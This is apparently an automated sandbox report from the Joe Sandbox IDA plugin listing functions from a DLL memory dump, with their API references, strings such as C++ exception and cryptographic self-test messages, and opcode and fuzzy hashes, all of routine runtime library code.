API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceFrequency failed with error
API String ID: 2175244869-348333943
Opcode ID: d86816c0c47a830d844d78af5b3645d8be452ff7247d13377fe8421c860efe0c
Instruction ID: 9e71a5a9f57843d70959ee18004af350be52f299ded5e89840f14c4ae29ae927
Opcode Fuzzy Hash: d86816c0c47a830d844d78af5b3645d8be452ff7247d13377fe8421c860efe0c
Instruction Fuzzy Hash: 02212FB150C380AFE310DF24D884B9FB7E8FB89658F504A1DF6A987281DB75D5048BA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D096480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6D096518

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

__CxxThrowException@8.LIBCMT ref: 6D096558

Strings

Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6D0964E7
Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6D096527

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3476068407-3345525433
Opcode ID: d115c1a9046d6ce2c7827aef7a479d6f2bbc4801bd4b4fe046fb4f6cf9cd27c9
Instruction ID: 295fd2b828d085cd60a0a1e1b4b352147572538452f3d81cbc5a0e8ddde59e0b
Opcode Fuzzy Hash: d115c1a9046d6ce2c7827aef7a479d6f2bbc4801bd4b4fe046fb4f6cf9cd27c9
Instruction Fuzzy Hash: AB21907151C380AEF724DF74C840FAFB3E8BB89658F914A1DE68987185EB7590048AA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D09C120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D09C14E

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

Strings

vector<T> too long, xrefs: 6D09C149
gfff, xrefs: 6D09C129
gfff, xrefs: 6D09C15A

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: d986bcab66227431b01786e3b4468311377579b62f756563c99909f7de06c59f
Instruction ID: 4dd54c287cb625be5d9a20b9c1a990a8cc4829543339a98d044ea436d8b6b8f7
Opcode Fuzzy Hash: d986bcab66227431b01786e3b4468311377579b62f756563c99909f7de06c59f
Instruction Fuzzy Hash: D701A273F140251F8311997FFD4055DE68BA6C9694329CA36E608DF349D531DC0252C6

Uniqueness

Uniqueness Score: -1.00%

Function 6D075160 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D075173

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

_memmove.LIBCMT ref: 6D07519E

Strings

n/m, xrefs: 6D075163, 6D0751BD
vector<T> too long, xrefs: 6D07516E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: n/m$vector<T> too long
API String ID: 1785806476-2795817194
Opcode ID: 55214253de61a3eec82293752a0108bbd55c18b9d0eb0955504ec83590dbf43c
Instruction ID: 9f097a5ac13d30fe2b7b3cb0f44c7197eed9b15841d04c96a3ece4fcea4f2421
Opcode Fuzzy Hash: 55214253de61a3eec82293752a0108bbd55c18b9d0eb0955504ec83590dbf43c
Instruction Fuzzy Hash: 5301A7B16042069FE724CEA8DC95A7FB3E8EB54209725492DE95AC7640E731F801CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6D0A25D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6D0A2677
_memmove.LIBCMT ref: 6D0A26E6
_memmove.LIBCMT ref: 6D0A2746
__CxxThrowException@8.LIBCMT ref: 6D0A27CD

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID:
API String ID: 2655171816-0
Opcode ID: 7333872763a1ba4a55effad5a908daa2e2620a752904bc97a97159a04cd86e06
Instruction ID: 34829f633e16730bd9e15af187b8d0e32f163122380a743be3d68b212ec46010
Opcode Fuzzy Hash: 7333872763a1ba4a55effad5a908daa2e2620a752904bc97a97159a04cd86e06
Instruction Fuzzy Hash: 27518D753087068FE714DFAAD980B2FB7EAAFC8604F15492DE595C3341EB34E9058B92

Uniqueness

Uniqueness Score: -1.00%

Function 6D07D4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D07D5E4
__CxxThrowException@8.LIBCMT ref: 6D07D5F9
std::exception::exception.LIBCMT ref: 6D07D608
__CxxThrowException@8.LIBCMT ref: 6D07D61D

Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C04
Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C1E
Part of subcall function 6D0C9BB5: __CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: d295e3e4cdbe39fdf595e9d3ef32593f64b219e4e9d9abba686533277a85bc0f
Instruction ID: e3111e04bf5c57e8c55e6cf57382afaca1d1db96a2f5bc771675600c7e48c734
Opcode Fuzzy Hash: d295e3e4cdbe39fdf595e9d3ef32593f64b219e4e9d9abba686533277a85bc0f
Instruction Fuzzy Hash: 9D515BB1A0064AAFD704CFA8C980B99BBF4FB48304F50826ED518DBB41D371E950CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D085F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D086035
__CxxThrowException@8.LIBCMT ref: 6D08604A
std::exception::exception.LIBCMT ref: 6D086059
__CxxThrowException@8.LIBCMT ref: 6D08606E

Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C04
Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C1E
Part of subcall function 6D0C9BB5: __CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 9f1e1a8c3abd9deda4242e2a9b45e5a0117a424fc68b1ff3cf2ddd205bff2aea
Instruction ID: 2290795fb08a1bc556e6a0b71f3735d4ce2e80bf3535f35fef922461f6dc626f
Opcode Fuzzy Hash: 9f1e1a8c3abd9deda4242e2a9b45e5a0117a424fc68b1ff3cf2ddd205bff2aea
Instruction Fuzzy Hash: 35516AB0A0464AAFDB04CFA8C980B99BBF4FF08304F508269D519D7B41D771E910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D07DE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D07DE81
VariantClear.OLEAUT32(?), ref: 6D07DF3C
VariantClear.OLEAUT32(?), ref: 6D07DF6D
VariantClear.OLEAUT32(?), ref: 6D07DF8B

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$Clear$Init
String ID:
API String ID: 3740757921-0
Opcode ID: 1ad4abc5fb820688f61012c0890c7bb1fa0b60a171f892d260a0e7fba988964f
Instruction ID: af83fa29fd302de8e54aa2a365d4f4cdf9e3facc32cf7d5a6f631edc7d180930
Opcode Fuzzy Hash: 1ad4abc5fb820688f61012c0890c7bb1fa0b60a171f892d260a0e7fba988964f
Instruction Fuzzy Hash: B2415A72608241DFE710DF2AC840B5AB7E9FBD9710F048A6DF9449B350E735E905CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 6D085DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D085E87
__CxxThrowException@8.LIBCMT ref: 6D085E9C
std::exception::exception.LIBCMT ref: 6D085EAB
__CxxThrowException@8.LIBCMT ref: 6D085EC0

Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C04
Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C1E
Part of subcall function 6D0C9BB5: __CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 67f245a3d36a20c3bcf8bb6f2b309c8c9f101fe8e4b8bd7e0358ce4e7c5cb522
Instruction ID: 0d62161c387e384c0e2bbef313e3b99ca87f487b880b6b0793afeab05c3593db
Opcode Fuzzy Hash: 67f245a3d36a20c3bcf8bb6f2b309c8c9f101fe8e4b8bd7e0358ce4e7c5cb522
Instruction Fuzzy Hash: 2E415BB18047489FD720CF68D980B9ABBF4FB08304F51496ED95A97741D771E504CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D07D360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D07D437
__CxxThrowException@8.LIBCMT ref: 6D07D44C
std::exception::exception.LIBCMT ref: 6D07D45B
__CxxThrowException@8.LIBCMT ref: 6D07D470

Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C04
Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C1E
Part of subcall function 6D0C9BB5: __CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 89dcc243e377f924aee73a328651383a579d912c732d83d8d8f7684e3bc919c4
Instruction ID: 81e3f254e25a800f0e4a2128a271ff550875adf079787ea3d5e086aea343c8b5
Opcode Fuzzy Hash: 89dcc243e377f924aee73a328651383a579d912c732d83d8d8f7684e3bc919c4
Instruction Fuzzy Hash: 774159B19047489FD720CFA8D980B9ABBF4FB08304F40896EE95A97B41D771F504CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C2B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

Part of subcall function 6D096480: __CxxThrowException@8.LIBCMT ref: 6D096518
Part of subcall function 6D096480: __CxxThrowException@8.LIBCMT ref: 6D096558

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D0C2C9A
__CxxThrowException@8.LIBCMT ref: 6D0C2CB1
std::exception::exception.LIBCMT ref: 6D0C2CC3
__CxxThrowException@8.LIBCMT ref: 6D0C2CDA

Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C04
Part of subcall function 6D0C9BB5: std::exception::exception.LIBCMT ref: 6D0C9C1E
Part of subcall function 6D0C9BB5: __CxxThrowException@8.LIBCMT ref: 6D0C9C2F

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$_malloc
String ID:
API String ID: 3942750879-0
Opcode ID: f5bbe69fb0ec7bb9852e50a841cce881c06ddd871ea1eabd7afc7d8e431c3b1f
Instruction ID: 8bf635d057cb6af32890de3057b448e9da641721316b16f8fb8409abd9fa8a3f
Opcode Fuzzy Hash: f5bbe69fb0ec7bb9852e50a841cce881c06ddd871ea1eabd7afc7d8e431c3b1f
Instruction Fuzzy Hash: 874146B15187419FE314CF69C880A5AFBF4BF99714F508A2EE29A87690D7B0E504CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D08B580 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(6D0E02A0), ref: 6D08B5D5
VariantInit.OLEAUT32(?), ref: 6D08B5E2
VariantClear.OLEAUT32(?), ref: 6D08B685
VariantClear.OLEAUT32(6D0E02A0), ref: 6D08B68B

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ClearInit
String ID:
API String ID: 2610073882-0
Opcode ID: 78ae3374fe8bb45acb090d819304f3cb7fc275e69878d2234b1764d0711a775d
Instruction ID: f584f0bb92c3647fb32a96423f340449f2f968acdf93e4e1d721b33bcb28d9c8
Opcode Fuzzy Hash: 78ae3374fe8bb45acb090d819304f3cb7fc275e69878d2234b1764d0711a775d
Instruction Fuzzy Hash: 13416F72A04209AFDB10DFA9C980B9AF7F9EF89314F20419DE9059B351DB36E901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D88C9 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6D0D88FD
__isleadbyte_l.LIBCMT ref: 6D0D8930
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?), ref: 6D0D8961
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?), ref: 6D0D89CF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9e837a89888eb273a1b7e8db98507e569b7e9d045307b8b74dff78573040b41a
Instruction ID: 377fc6e351ae51cacaf57bd01d56c59c50fffb96bffa425149bc5bad9c5ad7f4
Opcode Fuzzy Hash: 9e837a89888eb273a1b7e8db98507e569b7e9d045307b8b74dff78573040b41a
Instruction Fuzzy Hash: 56319C31A14346AFEB41DFA8C880BBE7BF5FF01311B1595AAE2A49B190D370D940DB52

Uniqueness

Uniqueness Score: -1.00%

Function 6D078470 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

InitializeCriticalSection.KERNEL32(00000000,00000000,6D075D89,00000000,00000004,00000000,?,00000000,00000000), ref: 6D0784EA
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000), ref: 6D0784F0
std::exception::exception.LIBCMT ref: 6D07853C
__CxxThrowException@8.LIBCMT ref: 6D078551

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CriticalInitializeSection$Exception@8Throw_mallocstd::exception::exception
String ID:
API String ID: 3005353045-0
